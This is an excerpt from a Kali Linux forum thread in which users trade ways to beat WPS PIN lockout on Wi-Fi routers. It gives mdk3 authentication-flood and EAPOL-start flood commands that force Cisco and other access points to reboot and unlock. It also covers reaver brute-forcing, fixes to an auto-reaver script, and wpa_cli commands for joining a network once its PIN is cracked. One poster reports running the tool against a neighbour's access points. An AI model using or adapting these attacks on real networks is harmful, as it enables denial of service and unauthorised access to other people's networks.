    I will release my method for sure..gave me a couple of days for a nice video presentation!

    EFFECTS OF USING MY METHOD

    I haven't seen anyone discussing the method which i am going to reveal but it relates using mdk3

    After using my method the router reboot and it needed sometime to "thaw off" before sending EAP again...this is roughly aorund
    a couple of seconds..if you don't leave it to thaw off and use the reaver command, you will recieve alot of EAP timeout messages before
    the router catches itself.but it is worth it rather than waiting for days for the router to unlock itself!!Also, it hops to another channel when it reboots so it
    is not wise to run reaver with a -c flag...i suppose this COULD part of cisco security mechanism feature..
    I am out for now.....
    Upon making a nice video presentation to prove this, i will release this information!.

  23. #23
    Join Date
    2013-Jun
    Posts
    125

    To everyone-another effective method to unlock wps mechanism on a wps router!

    Quote Originally Posted by repzeroworld View Post
    TO: EVERYONE- EFFECTIVE WAY TO RESET A MODERN CISCO ACCESS POINT BY FLOODING FOR 10-20 SECONDS!
    i have found a way to effectively flood a new model (either year 2012/2013 manufactured) cisco router to make it reboot with a wps locked
    status as "NO". Also i will prove that using Authentication DOS mode flooding has no effects of flooding THIS router!


    DETAILS OF THIS ROUTER

    From one of the M1 EAP packets captured from my wireless card, details of this router are as follows

    bssid c8:d7:19:0a:bf:35
    Manufacturer: Cisco
    Model Number: 123
    Serial Number: 12345
    Model Name: WAP
    Channel type: 802.11g (pure-g) (0x00c0)

    I did some research using these details found found out that this access point was modern in age.

    Behaviour of this CISCO Router

    This type of router is not affected by a script changing your mac address. Also if you try a 3 pins the router starts
    an exponential clock that rate limit another counple of pins reaver tries and then the router totally lock itself for one/two day.
    even if i gave reaver the option to try 1 pin every 3 minutes (worthless).. after a couple of pin attempts it locks up one/two days.
    I will release my method for sure..gave me a couple of days for a nice video presentation!

    EFFECTS OF USING MY METHOD

    I haven't seen anyone discussing the method which i am going to reveal but it relates using mdk3

    After using my method the router reboot and it needed sometime to "thaw off" before sending EAP again...this is roughly aorund
    a couple of seconds..if you don't leave it to thaw off and use the reaver command, you will recieve alot of EAP timeout messages before
    the router catches itself.but it is worth it rather than waiting for days for the router to unlock itself!!Also, it hops to another channel when it reboots so it
    is not wise to run reaver with a -c flag...i suppose this COULD part of cisco security mechanism feature..
    I am out for now.....
    Upon making a nice video presentation to prove this, i will release this information!.

    ANOTHER EFFECTIVE WAY TO REBOOT A WPS ACCESS POINT AND RESET WPS LOCKED STATUS TO “NO”

    THIS LINK *REMOVED* AS A VIDEO I HAVE DONE TO SHOW HOW I USE THE TWO ATTACKS AND WHICH ONE WAS MORE EFFECTIVE WITH THIS PARTICULAR AP.

    BRIEF NOTES
    I focused on the stated Cisco Access Point that I came across with the new exponential wps mechanism.

    THE TWO ATTACKS I USED ARE:
    1. MDK3 Authentication DOS Flood Attack- floods the AP with too much fake clients so that the router is overloaded
    2. EAPOL Start Flood Attack- Authenticates to the AP and sends too much EAPOL Start requests so that the router is unable to respond to the volume of EAPOL requests and reboot itself.

    MDK3 AUTHENTICATION DOS FLOOD ATTACK
    This attack is useful on SOME routers. The important point to note is HOW I USE THESE ATTACKS!.
    ( I have three wireless adapter- AWUS036NHA, AWUS036NH and TP-LINK 722N and I use AWUS036NHA and AWUS036NH to carry out this attack numerous times)
    HOW I ATTACKED THIS ACCESS POINT USING AUTHENTICATION DOS FLOOD ATTACK
    I started my wireless card on three monitor interface, mon0, mon1 and mon2
    In three terminal, I use the command line
    mdk3 mon0 a –a C87:19:0A:BF:35 #TERMINAL 1
    mdk3 mon1 a –a " " " # TERMINAL 2
    mdk3 mon1 a –a " " " #TERMINAL 3
    Note:
    I ensure that the router was wps locked permanently so that I can test the effectiveness of the attack. Also, a point to note, I did not use one command line with one monitor interface since it was futile. I blasted the router on three monitor interfaces!.Now I am blasting away the router for hours!. After blasting away the Access Point is still locked! I tried this attack for days to convince myself!.


    MDK3 EAPOL START FLOOD ATTACK

    I started my wireless card on three monitor interface, mon0, mon1 and mon2
    mdk3 mon1 x 0 –t C87:19:0A:BF:35 –n Riznet –s 100 #TERMINAL 1 (SEE VIDEO FOR REASON OF USING –S 100 FLAG)
    mdk3 mon1 x 0 –t " " " –n Riznet –s 100 # TERMINAL 2
    mdk3 mon1 x 0 –t " " " –n Riznet –s 100 #TERMINAL 3
    Note: I tried again using 1 monitor interface to carry out the attack but it took hours for the router to reboot and I was not sure if the attack was the main reason for the router rebooting!. In this scenario I tried blasting the router in three terminals. This “Shock Attack” method ran for about 20 seconds and the router reboot with wps locked status as “NO”. I TRIED THIS ATTACK A COUPLE MORE TIMES FOR ABOUT 20 SECONDS WITH THE ACCESS POINT REBOOTING AND UNLOCKING ITSELF (WPS) !!. Also packet analysis significantly helped me to understand the connection between EAPOL and a router behavior to open authentication request which makes it impossible to stick to one method for flooding ALL AP (see the video link above).

    BASH SCRIPT WRITING
    Soon I will write a bash script to execute all the steps in my video (I need time to chill….).

    OTHER ACCESS POINTS INVESTIGATED
    I Have Also Assessed The Behaviour Of Three Other Cisco Access Points That Rate Limit Pin In A Systematic Way But Did Not Locked Up in an exponential manner!. I will give gave an update if I do come across any other access points that behaved somewhat different. Do share your experience in relation to any new updates on wps!
    Last edited by g0tmi1k; 2014-12-11 at 10:59. Reason: Youtube

  24. #24
    Join Date
    2014-Feb
    Posts
    14
    pardon me I'm a noob, but block the AP the MAC or the service wps 4 ewery client?

  25. #25
    Join Date
    2014-Apr
    Posts
    4
    Great post repzerowold! I'll try this today

  26. #26
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by i6l6l6u View Post
    pardon me I'm a noob, but block the AP the MAC or the service wps 4 ewery client?
    I didn't get you clear my friend.

  27. #27
    Join Date
    2014-Feb
    Posts
    14
    Quote Originally Posted by repzeroworld View Post
    I didn't get you clear my friend.
    Thanks for your answer. since you've responded to you had me answer the question too my friend. That would be more worthwhile

  28. #28
    Join Date
    2013-Jun
    Posts
    125
    TO: EVERYONE-THREE OTHER ACCESS POINTS THAT WERE DEFEATED BY THE MDK3 EAPOL START ATTACK!!
    I have underestimated this attack!. IT WORKS ON ALMOST ALL THE AP THAT I PICKED UP THAT HAS THE WPS RATE LIMITING FEATURE..
    Despite some AP refuses to accept to many eapol packets, one mdk3 authenticates it floods the AP quickly until a deauthentication
    packet is sent from the AP to break the connection.

    FOR FURTHER PROOF CHECK ANOTHER VIDEO IS POST ON MY CHANNEL

    LINK *REMOVED*

    Also, instead of running three attacks in three terminal, i used one terminal to carry out three attacks RUNNING AT THE SAME TIME using

    EXAMPLE
    #timeout <seconds> mdk3 mon0 x 0 -t <bssid> -n <essid> -s <no. of packets/sec> & timeout <seconds> mdk3 mon1 x 0 -t <bssid> -n <essid> -s <no. of packets/sec) & timeout <seconds> mdk3 mon2 x 0 -t <bssid> -n <essid> -s <no. of packets/sec>

    PENDING: I AM CURRENTLY WRITTING A GENERAL INTERACTIVE BASH SCRIPT TO CARRY OUT ANY MDK3 ATTACK USING MY METHOD WITH REAVER! I WILL POST ONCE FULLY FINSHED.
    IF ANYONE HAS A SCRIPT FOR REAVER AND MDK3 (TO CARRY OUT ANY ATTACKS) DO SHARE SO THAT I CAN COMPARE IT WITH MY WORK IN PROGRESS SCRIPT!
    Last edited by g0tmi1k; 2014-12-09 at 14:46. Reason: Youtube

  29. #29
    Join Date
    2013-Jun
    Posts
    125
    thank you itmanvn!

  30. #30
    So if i understand correctly you have to make the router restart after a couple of pin tries?
    If this is the case than won't it make the reaver attack take a much longer time to get the WPS PIN?
    I am trying this on my docsis 3.0 router because it locks the WPS. But this router takes around 2 minutes to restart!
    Is there any way to get past it without having to restart the router alot?
    Last edited by luckybanger7; 2014-06-26 at 10:13.

  31. #31
    Join Date
    2014-Jun
    Posts
    1
    If you have trouble with WPS Locked situation consider using my script:
    https://code.google.com/p/auto-reaver/
    Best Regards!

  32. #32
    Join Date
    2013-Oct
    Posts
    10
    Awesome script repzeroworld.

    For all interested, I put a Reaver Pro vs. ReVdK3-r1.sh video up on youtube as a demonstration:
    *REMOVED*

    If you don't mind constructive criticism:

    I would add checks for gnome-terminal && apt-get install gnome-terminal.
    I had difficulties porting the script to be used with a different (less bloated) terminal client, right now I have a somewhat working version that does not call for gnome-terminal but runs the entire script in one terminal window only.

    Sometimes I have ctrl-c errors, sometimes after quiting I have to ifocnfig wlan0 up again.

    Maybe add some wpa_cli commands to connect to the Clients WPS protected router upon cracking the PIN#

    wpa_cli wps_reg [ap mac addy] [wps pin#] (connects interface to AP using PIN#)

    dhclient wlan0 (requests an IP address from the AP)

    wpa_cli scan_results | grep WPS (will show up WPS protected AP's kinda like a wash alternative)

    Email pin# to $emailaddress upon successful completion.

    Again, way to go. This is an awesome reaver helper tool.
    Last edited by g0tmi1k; 2014-12-09 at 14:47. Reason: Youtube

  33. #33
    Join Date
    2013-Jul
    Posts
    844
    Musket Teams feel the program autoreaver is a significant step forward in defeating attempts by programers to block reaver thru alterations in the routers firmware.

    We are slowly working thu this program. The first major obstacle we encountered was getting the washAutoReaverList program to write the list. We think the problem is in the awk portion of the command string as we only got the program to write the list once. Rather then spend time debugging,we used the following simple solution as follows:

    cd auto-reaver
    ./wash > myAPTargets

    Now go to the exampleAPList. Rewrite the myAPTargets so that it matches to format in the exampleAPlist file. You can also remove targets you do not want to crack.

    In closing when consulting the google help file some of the file names referenced in the help file donot match actual file names found in the folder.

    We are still working thru the possibilies available in this nice script.

    MTA

  34. #34
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by 0E 800 View Post
    Awesome script repzeroworld.

    For all interested, I put a Reaver Pro vs. ReVdK3-r1.sh video up on youtube as a demonstration:
    *REMOVED*

    If you don't mind constructive criticism:

    I would add checks for gnome-terminal && apt-get install gnome-terminal.
    I had difficulties porting the script to be used with a different (less bloated) terminal client, right now I have a somewhat working version that does not call for gnome-terminal but runs the entire script in one terminal window only.

    Sometimes I have ctrl-c errors, sometimes after quiting I have to ifocnfig wlan0 up again.

    Maybe add some wpa_cli commands to connect to the Clients WPS protected router upon cracking the PIN#

    wpa_cli wps_reg [ap mac addy] [wps pin#] (connects interface to AP using PIN#)

    dhclient wlan0 (requests an IP address from the AP)

    wpa_cli scan_results | grep WPS (will show up WPS protected AP's kinda like a wash alternative)

    Email pin# to $emailaddress upon successful completion.

    Again, way to go. This is an awesome reaver helper tool.
    thank you...i will make a note of of your suggestions especially the one where the script does not bring wlan0 up after quitting!..if i do embark on another revision of the script i will put this in place and rewrite script in python codes since it is a wonderful programming language...cheers!
    Last edited by g0tmi1k; 2014-12-09 at 14:47. Reason: Youtube

  35. #35
    Join Date
    2013-Jul
    Posts
    844
    Musket Teams wish to report that auto-reaver cannot be run in Kali-linux but does run fine in BT5R3. As this is a kali-linux forum we will wait till the author rewrites this program specifically for kali-linux.

  36. #36
    Join Date
    2014-Jul
    Posts
    1
    Quote Originally Posted by mmusket33 View Post
    Musket Teams wish to report that auto-reaver cannot be run in Kali-linux but does run fine in BT5R3. As this is a kali-linux forum we will wait till the author rewrites this program specifically for kali-linux.

    Hi,

    Don´t know yet the effectiveness of the auto-reaver script when running in Kali Linux (newbie here).
    To make it executable in Kali (live USB) i did the following changes:

    - Added missing function "echoBlue" to autoreaver file:
    echoBlue(){
    echo -e "\033[1m\E[34m$@\033[0m"
    }
    - Changed WIFI_DRIVER in resetWifiCard() function in autoreaver file to match my wi-fi card driver:
    - local WIFI_DRIVER = "kernel wireless driver name"
    Note: use "lspci" command to get driver address; use "lspci -vv -s driver_address" to get the driver name;

    -Installed "gawk" extension:
    http://www.chemie.fu-berlin.de/chemn...k/gawk_20.html

    - To create the AP list i execute "wash > myAPTargets" and then edit myAPTargets for same format as exampleAPList file.

    Other small changes so i could run in Kali Live USB:
    - Changed REAVER_SESSION in "configurationSettings" to "/etc/reaver"

    I am currently running Auto-Reaver in Kali and it seems that APs gets blocked after 2 pin attempts (no mac changing at this point)... this is my neighbour AP list so i don´t know AP manufacturers.


    Cheers

  37. #37
    Join Date
    2013-Jul
    Posts
    844
    Thanx Linton our teams did not have the time to debug the program as we are working on other projects. Hopefully the author will rewrite for kali-linux and publish. We will make the changes and test this programs possibilities and report back anything of interest we find here.

    MTB

  38. #38
    Join Date
    2013-Jul
    Posts
    844
    Linton

    Reference the autoReaver rewrite for kali-linux
    Your suggestions have worked great. Here is how we did it

    -We added the missing function "echoBlue" to autoreaver file:

    echoBlue(){
    echo -e "\033[1m\E[34m$@\033[0m"

    Altered the configuration settings file in the auto-reaver folder to read /etc/reaver

    We updated awk with

    apt-get install original-awk

    then

    apt-get install gawk

    We had problems finding the driver with lspci etc so we used airmon-ng and got the driver that way

    We changed

    local WIFI_DRIVER=$(getWifiCardDriver);

    to read

    local WIFI_DRIVER=rtl8187

    The preliminary functions seem to work in our lab. We have to load another computer closer to test targets to see if it is functioning. Will advise

    MTB

  39. #39
    Join Date
    2014-Jan
    Posts
    2
    Can you post link for modified files so we can test it in Kali Linux ?

  40. #40
    Join Date
    2013-Jul
    Posts
    844
    Further debugging of autoReaver

    When we tried to run autoReaver in a Hard drive install of Kali-linux 1.07 we were unable to install

    apt-get install original-awk
    apt-get install gawk

    We got warnings that mawk was in residence and when we tested autoReaver against real AP targets we got numerous gawk line errors. To solve this we changed all gawk entries to mawk. We left awk entries in place. The program ran fine after that.

    Note this only applied to our HD install.

    MTF
    Last edited by mmusket33; 2014-07-02 at 10:43.

  41. #41
    Join Date
    2013-Jul
    Posts
    844
    To Ed1i

    The link for the original file is in this thread. The author has written an extensive help file at the download address. All the info you need to rewrite for kali-linux is seen above. We suggest you first up-date your kali-linux before you try the apt-get install suggestions we posted.
    We are not the authors of this program so I suggest you write the author and he might do the rewrite for kali-linux and post for you. Otherwise just follow the simple suggestions provided by Linton and confirmed by Musket Teams.

    MTB

  42. #42
    Join Date
    2014-Jul
    Posts
    2
    Does anybody know what it means when wash returns an AP as (null) instead of NO or YES as to whether WPS is locked? also note that the same AP was showing NO before I tried the reaver attack. Thank you

  43. #43
    Join Date
    2013-Jul
    Posts
    844
    Reference the washAutoReaverList script in the auto-reaver program. We spent hours trying to debug the code but the awk function would not function properly. Using kali-1.08 persistent usb we then simply installed gawk

    apt-get install gawk

    After this the washAutoReaverList scipt in autoreaver functioned perfectly. The main autoreaver script still needs to be rewritten as indicated in this thread.

    MTC

  44. #44
    Join Date
    2015-Mar
    Posts
    1

    Mac Address Rotation

    Hey guys,

    with the blocking that I am getting.. it makes sense if there is a rotating MAC address to continue with the exploit. Is there a way to tell the MAC address to automatically change on every attempt?

    thanks for any help...







    Quote Originally Posted by soxrok2212 View Post
    Check out my post (register mentioned it above also). You can use MDK3 to DOS the router which MAY cause it to reboot and unlock WPS for a little while.

  45. #45
    Quote Originally Posted by sirjohn View Post
    Hey guys,

    with the blocking that I am getting.. it makes sense if there is a rotating MAC address to continue with the exploit. Is there a way to tell the MAC address to automatically change on every attempt?

    thanks for any help...
    Same question

  46. #46
    Join Date
    2013-Jul
    Posts
    844
    Rotating the mac address has little to no effect - Go to the WPS Reaver site and read thru issues 675,676 and 677 and download vmr-mdk2x. Find the latest version or look in aircrack-ng forums the download links are there as well.

    MTeams

Similar Threads

  1. Weird situation with zsh-syntax-highlighting.zsh
    By kalinoobtester in forum General Archive
    Replies: 0
    Last Post: 2022-12-14, 12:04
  2. wps locked reaver !!
    By 0ops in forum General Archive
    Replies: 4
    Last Post: 2016-03-09, 19:48
  3. Replies: 8
    Last Post: 2015-04-26, 21:40

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •